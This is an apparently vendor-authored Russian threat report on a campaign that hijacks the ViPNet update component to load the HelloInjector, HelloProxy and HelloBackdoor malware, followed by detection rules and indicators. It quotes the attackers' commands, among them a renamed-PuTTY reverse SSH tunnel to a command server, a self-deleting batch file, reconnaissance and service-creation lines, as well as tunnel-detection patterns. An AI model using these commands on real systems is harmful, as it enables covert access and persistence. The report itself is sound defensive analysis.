Обновление от 16 июля 2026 года: Добавлены правила защиты для компаний, использующих SIEM-систему Kaspersky Unified Monitoring and Analysis Platform (KUMA), включая события для создания собственных правил детектирования и проведения анализа угроз.
Обновление от 16 июля 2026 года: Опубликованы рекомендации по обнаружению вредоносной деятельности с использованием сервиса Kaspersky Managed Detection and Response.
Обновление от 16 июля 2026 года: Включены правила и примеры выявления угроз с помощью KEDR Expert.
Обновление от 16 июля 2026 года: Добавлено обнаружение вредоносной кампании в сетевом трафике с использованием Kaspersky Anti Targeted Attack (KATA) и модуля сетевого мониторинга.
Обновление от 16 июля 2026 года: Расширен перечень индикаторов компрометации и опубликован полный список методов и приемов атаки.
Описание обнаруженной кампании
Специалисты обнаружили новую операцию целевой атаки с использованием ранее неизвестных инструментов, которая началась не ранее мая 2026 года и продолжает быть активной. Ключевой особенностью операции является использование вредоносных компонентов, которые запускаются через механизм обновления программного комплекса ViPNet (система создания защищённых сетей). Исследование показало целенаправленные попытки инфицирования крупных российских компаний из государственного, энергетического, транспортного, образовательного, логистического секторов и промышленности. Это уже второй случай, когда продвинутые группы атакующих нацеливаются на компьютеры в сетях ViPNet. Ранее был обнаружен сложный вредонос, имитирующий обновления ViPNet.
Механизм закрепления через систему обновления
При анализе одной из скомпрометированных систем был найден вредоносный файл с именем wtsapi32.dll в папке C:\Program Files (x86)\InfoTeCS\VIPNet Update System, относящейся к компоненту обновления ViPNet. Разместив файл в этом месте, злоумышленники применяют технику подмены библиотеки — исполняемый модуль системы обновления ViPNet itcsrvup64.exe загружается при загрузке операционной системы. Таким образом, атакующие достигли закрепления на компьютере посредством компонента обновления ПО ViPNet.
HelloInjector: загрузчик для запуска дополнительных компонентов
Компонент wtsapi32.dll представляет собой загрузчик, названный HelloInjector. Его основной функцией является внедрение кода в процесс svchost.exe и инициация вредоносной нагрузки. После загрузки вредонос проверяет, в контексте какого процесса он был активирован. Если это не svchost.exe, загрузчик начинает перебор всех активных процессов в поиске того, чье имя содержит svchost, а параметры запуска включают netsvcs. Обнаружив такой процесс, загрузчик внедряет себя в него, используя функции NtWriteVirtualMemory и NtCreateThreadEx.
После повторного запуска в контексте нового процесса загрузчик вновь проверяет имя процесса на наличие строки svchost. После успешной проверки HelloInjector загружает и запускает хранящуюся в его теле вредоносную нагрузку.
HelloProxy: инструмент для перенаправления трафика и загрузки дополнительных модулей
Вредоносная нагрузка, обозначенная как HelloProxy, одновременно работает как скрытый прокси-сервер и загрузчик для последующих модулей с командного сервера. Она достигает этого посредством перехвата функций NtDeviceIoControlFile, closesocket и shutdown, используя библиотеку Detours от Microsoft. Обработчики closesocket и shutdown препятствуют преждевременному закрытию соединений, используемых для взаимодействия с командным сервером. Обработчик NtDeviceIoControlFile реализует основную вредоносную логику, перехватывая два IOCTL-кода:
-
AFD_RECV(0x12017) -
AFD_GET_TDI_HANDLES(0x12037)
Эти коды используются при работе с сокетами, и их перехват позволяет вредоносу блокировать защитные решения пользовательского уровня, фильтрующие сетевые подключения. Средства защиты «Лаборатории Касперского» выявляют такую деятельность и предотвращают инфицирование на всех стадиях атаки.
Обработчик AFD_GET_TDI_HANDLES отвечает за регистрацию соединения, а обработчик AFD_RECV обрабатывает входящие данные. Каждое входящее сообщение, обработанное через AFD_RECV, записывается в файл C:\users\public\tesh4RPC.txt в формате threadid: pid=\r\n. После установки перехватчиков вредонос начинает мониторить порты 5003 и 5060 для получения команд от командного сервера. Для различения трафика командного сервера вредонос реализует процедуру аутентификации: отправляет байты 0x0502 через соединение и ожидает ответ, содержащий строку ASDFASFSAFASDF. После успешной аутентификации начинается обработка команд.
В зависимости от полученной команды возможны два режима работы:
- Режим прокси-сервера: вредонос получает данные в формате
<ip_addr>:<port>, создает новые соединения и перенаправляет трафик между ними. - Режим загрузчика: вредонос получает исполняемый файл от командного сервера, загружает его в памяти собственного процесса и запускает в отдельном потоке.
При исследовании были обнаружены две вредоносные нагрузки, внедренные в процесс svchost, вероятно работавшие под управлением описанного загрузчика:
- компонент HelloExecutor, позволяющий атакующим выполнять команды на инфицированной системе;
- модуль HelloCleaner для удаления логов ViPNet, скрывающий следы деятельности злоумышленников.
Анализ показал, что вредонос HelloExecutor использовался для сбора информации в сетях скомпрометированных организаций. Были выполнены следующие командные операции:
query user ipconfig /all ping 8.8.8.8 -n 1 net user /do net group /do dir 'C:\Program Files (x86)' dir 'C:\Program Files (x86)\infotecs\' dir 'C:\Program Files (x86)\infotecs\ViPNet Administrator' dir 'C:\Program Files (x86)\infotecs\ViPNet Client\Export' dir 'C:\Program Files (x86)\infotecs\ViPNet Client' dir 'С:\ProgramData\Infotecs\ViPNet Administrator\kc\Export\' dir '$appdata\Infotecs\ViPNet Administrator\kc\Export\ Dst for network ' dir c:\users\[username] query user dir C:\Users\Public\music
Обращает на себя внимание упоминание папки C:\Users\Public\Music. На скомпрометированных компьютерах злоумышленники использовали эту папку при организации SSH-туннеля из инфицированной инфраструктуры на командный сервер атакующих (5.39.253[.]206). Применялась переименованная копия утилиты PuTTY (клиент протоколов удаленного доступа):
C:\users\public\music\frontpage.exe -C -N -R 8443:[redacted]:5003 sftp@5.39.253[.]206 -P 3522 -pw [redacted]
HelloBackdoor: вредонос на языке Rust для операций с файлами
На одной из инфицированных систем был обнаружен вредонос, разработанный на языке Rust, обозначенный как HelloBackdoor. Он ожидает подключений на порт 443, проверяя поступление строки 47c6235b4d2611184 (вторая часть MD5-хэша текста hello\n) для активации функциональности. Вредонос поддерживает следующие команды:
!upload — загрузить файл на инфицированный компьютер
!down — выгрузить файл с инфицированного компьютера
!stop — остановить работу. При этом создается и исполняется пакетный файл со следующим содержимым:
@echo off :loop if exist ( del /F /Q if exist goto loop ) sc stop iplircontrol >nul timeout 5 > nul sc start iplircontrol > nul (goto) 2>nul & del /F /Q %0
Если полученная команда не совпадает с перечисленными выше, она выполняется через cmd.exe.
Определение происхождения атаки
При анализе образца файла wtsapi32.dll была обнаружена невиспользуемая строка кода:
GET / HTTP/1.1\r\nHost: news.sina.com\r\nConnection : keep - alive\r\nUpgrade - Insecure - Requests : 1\r\nUser - Agent : Mozilla / 5.0 (Windows NT 10.0; Win64; x64) AppleWebKit / 537.36 (KHTML, like Gecko) Chrome / 145.0.0.0 Safari / 537.36 Edg / 145.0.0.0\r\nAccept : text / html, application / xhtml + xml, application / xml; q = 0.9, image / avif, image / webp, image / apng, */*;q=0.8,application/signed-exchange;v=b3;q=0.7\r\n .
Эта строка содержит ссылку на популярный в Китае новостной портал sina.com.
Дополнительно при анализе текстовых строк в HelloBackdoor было выявлено, что во время компиляции использовалось зеркало mirrors.ustc.edu.cn для загрузки библиотек Rust. Вероятно, эти строки остались случайно, однако существует возможность использования их в качестве ложных указаний для затруднения определения происхождения. В настоящее время с низким уровнем уверенности предполагается связь этой операции с неизвестной китайскоязычной группой продвинутых атакующих.
Практические рекомендации
Учитывая повторное использование ПО ViPNet продвинутыми группами атакующих, рекомендуется усилить защиту компьютеров с этим ПО. В частности, необходимо организовать мониторинг сетевого трафика на указанных в документе портах для своевременного обнаружения признаков инфицирования.
Защита от сложных целевых атак требует комплексного подхода, объединяющего различные технологии защиты на разных этапах жизненного цикла атаки. Многоуровневая модель обороны позволяет не только обнаруживать, но и предотвращать инциденты такого типа. Этот принцип реализован в продуктах линейки Kaspersky Symphony для защиты компаний от атак уровня APT, включая операции, подобные описанной.
Средства защиты «Лаборатории Касперского» выявляют эту угрозу по следующим сигнатурам:
- Trojan.Win32.Agentb.ttoe
- Trojan.Win64.Convagent.gen
- Trojan.Win64.Agent.smgpqx
- HEUR:Trojan.Win64.DllHijacking.gen
Выявление угроз средствами защиты
Средства защиты «Лаборатории Касперского», включая Kaspersky Endpoint Detection and Response Expert, эффективно выявляют вредоносную деятельность в ходе этих атак.
Одним из практических подходов к выявлению является мониторинг переименованных копий утилит PuTTY/Plink не по имени файла: даже если исполняемый модуль называется frontpage.exe, его PE-заголовок, версия, встроенные строки и хеш совпадают с оригинальным Plink, что регистрируется в событиях EDR. Также следует отслеживать специфические параметры запуска процесса. Решение KEDR Expert выявляет эту деятельность согласно правилу using_plink_or_putty_for_port_forwarding.
Важно отслеживать внедрение кода в svchost.exe из процесса обновления ViPNet itcsrvup64.exe, поскольку в нормальном режиме этот компонент не должен выполнять такие операции. Такое поведение является типичным признаком деятельности HelloInjector, использующего подписанный процесс для маскировки. Решение KEDR Expert выявляет эту деятельность согласно правилу vipnet_load_library_code_injection.
Еще один эффективный способ выявления — мониторинг сетевого трафика. Решение Kaspersky Anti Targeted Attack (KATA) с модулем сетевого мониторинга обнаруживает эту деятельность через IDS-модуль и правила Suricata для обнаружения HelloBackdoor.
Правило разработано на основе анализа первого ожидаемого пакета. Вредонос принимает подключения по TCP на портe 443, ожидая строки 47c6235b4d2611184 (часть MD5-хэша hello\n), которая активирует функциональность.
Сервис Kaspersky Managed Detection and Response выявляет эту операцию через мониторинг следующих действий:
- Создание библиотеки
wtsapi32.dllв папкеC:\Program Files (x86)\InfoTeCS\VIPNet Update System. - Запуск необычных процессов из компонента обновления ViPNet (
Itcsrvup64.exeилиItcsrvup.exe), не имеющих подписи от InfoTeCS. - Создание файлов библиотек (.dll) в папках, относящихся к ViPNet, из процессов ViPNet.
- Необычная деятельность от экземпляра
svchost.exe(создание файлов, запуск процессов). - Создание исполняемых файлов в стандартных папках для записи (
%ProgramData%,%TEMP%,%SystemRoot%\Temp, C:\Users\Public\, music|pictures|videos|contacts|links|libraries). - Мониторинг создания туннелей через ssh или plink (определение по оригинальному PE-имени, а не имени файла), детект строится на наличие в параметрах запуска строк вида port:address:port и их вариантов.
Для защиты организаций, использующих SIEM-систему Kaspersky Unified Monitoring and Analysis Platform (KUMA), в репозитории продукта доступны правила для выявления такой вредоносной деятельности.
Выполнение операций разведки пользователей, групп и сетевых подключений стандартными средствами Windows обнаруживается следующими правилами:
- R220_02_Сбор информации об учетных записях стандартными средствами Windows
- R221_01_Сбор информации о группах с помощью инструментов Windows
- R224_02_Сбор информации об удаленной системе стандартными средствами Windows
- R224_14_Разведывательная активность на Windows
- R226_02_Сбор информации о сетевых подключениях стандартными средствами Windows
Для разработки собственных правил выявления или анализа угроз рекомендуется обратить внимание на следующие события:
- Создание подозрительных файлов в папке обновления ViPNet
C:\Program Files (x86)\InfoTeCS\VIPNet Update System:(DeviceEventClassID = '4663' OR DeviceEventClassID = '11') AND match(FileName, '.*\\.(exe|dll)') AND FileName ilike '%\InfoTeCS\VIPNet Update System\%'
- Подмена библиотек с загрузкой
wtsapi32.dllв процессы обновления ViPNetItcsrvup64.exeилиItcsrvup.exeбез правильной подписи (Signed not true, SignatureStatus not valid) или подпись от другого издателя:DeviceEventClassID = 7 AND match(DestinationProcessName, '.*\\\\(itcsrvup64|itcsrvup)\\.exe') AND FileName ilike '%wtsapi32.dll' AND FileName ilike '%\InfoTeCS\VIPNet Update System\%' AND ((DeviceCustomNumber1 = 0 AND DeviceCustomNumber2 = 0) OR NOT FlexString2 ilike '%InfoTeCS%')
- Запуск нестандартных процессов из компонента обновления ViPNet
Itcsrvup64.exeилиItcsrvup.exe:(DeviceEventClassID = '4688' OR DeviceEventClassID = '1') AND match(SourceProcessName, '.*\\\\(Itcsrvup64|Itcsrvup)\\.exe') AND NOT match(DestinationProcessName, '.*\\\\(wmail|monitor|itcsrvup64)\\.exe')
- Запуск компонента обновления ViPNet
Itcsrvup64.exeилиItcsrvup.exeбез правильной подписи (Signed not true, SignatureStatus not valid) или подпись от другого издателя:DeviceEventClassID = '1' AND match(DestinationProcessName, '.*\\\\(Itcsrvup64|Itcsrvup)\\.exe') AND ((DeviceCustomNumber1 = 0 AND DeviceCustomNumber2 = 0) OR NOT FlexString2 ilike '%InfoTeCS%')
- Необычное выполнение операций разведки из процесса svchost.exe:
(DeviceEventClassID = '4688' OR DeviceEventClassID = '1') AND SourceProcessName ilike '%svchost.exe' AND match(DeviceCustomString4, '.*cmd(.exe)?.*\/c\s+(net\s+(use|group)|sc\s+(query|start|stop)|ping|ipconfig|netstat).*')
- Создание туннелей через переименованные процессы ssh или plink:
DeviceEventClassID = '1' AND match(OldFileName, '.*(plink|ssh).*') AND DeviceCustomString4 match '\d+:\d+\.\d+\.\d+\.\d+:\d+'
Для корректной работы правил выявления необходимо убедиться, что события от компьютеров поступают в KUMA в полном объеме, включая события с идентификаторами: Sysmon 1, 7, 11, а также Security 4688, 4663.
Индикаторы компрометации
HelloBackdoor
16C211C96735F2FAE9361B89BD7A31BF
1BFE2B9493128574907A8279256A8BCC
f9eed2f0158dc98e7012fb809152209c
Загрузчики для HelloBackdoor
6001829A128FE264B4403138700C11A8 — infotecs\vipnet client\puh.exe
EE4FF46DDD8489E81447962F927BC3F6 — infotecs\vipnet client\store.exe
Утилита для добавления исключений в Windows Defender
41c938b3cd7e55d4077e34976929b140
wtsapi32.dll
B103CD21280B4061F88B2BCC51394894
9F5606A0755BC633B9BD7DB6D179C09E
0CFDFFC56F0FA325D0C4D24780B46597
Командные серверы
5.39.253[.]206
176.32.34[.]135
Обнаруженные методы и приемы атаки
T1569.002 — System Services: Service Execution
'cmd' /c sc start UrBackupClientBackend
T1016 — System Network Configuration Discovery
'cmd' /c arp -a'cmd' /c routeprint
T1049 — System Network Connections Discovery
'cmd' /c netstat -ano
T1018 — Remote System Discovery
'cmd' /c ping mail.ru -n 2
T1082 — System Information Discovery
'cmd' /c systeminfo
T1057 — Process Discovery
'cmd' /c tasklist
T1007 — System Service Discovery
'cmd' /c sc query UrBackupClientBackend
T1083 — File and Directory Discovery
'cmd' /c dir temp*.tmp'cmd' /c dir $temp\*.tmp'cmd' /c dir amgmt*'cmd' /c dir $user\desktop\mRemoteNG-Portable-1.76.20.24669'cmd' /c dir $public\libraries\'cmd' /c dir d:\WindowsImageBackup
T1005 — Data from Local System
'cmd' /c type $temp\TS_E9E3.tmp'cmd' /c type $temp\Acr6F3D.tmp
T1074.001 — Local Data Staging
'cmd' /c copy appdata\infotecs\*\APN000B.txt $public\libraries\
T1070.004 — Indicator Removal: File Deletion
'cmd' /c del $windir\amgmt.dll'cmd' /c del $public\libraries\APN000B.txt
T1543.003 — Create or Modify System Process: Windows Service
sc stop AppMgmtsc delete AppMgmtsc create AppMgmt binpath= 'system32\svchost.exe -k netsvcs' type= share start= auto displayname= 'Application Management'sc description AppMgmt '
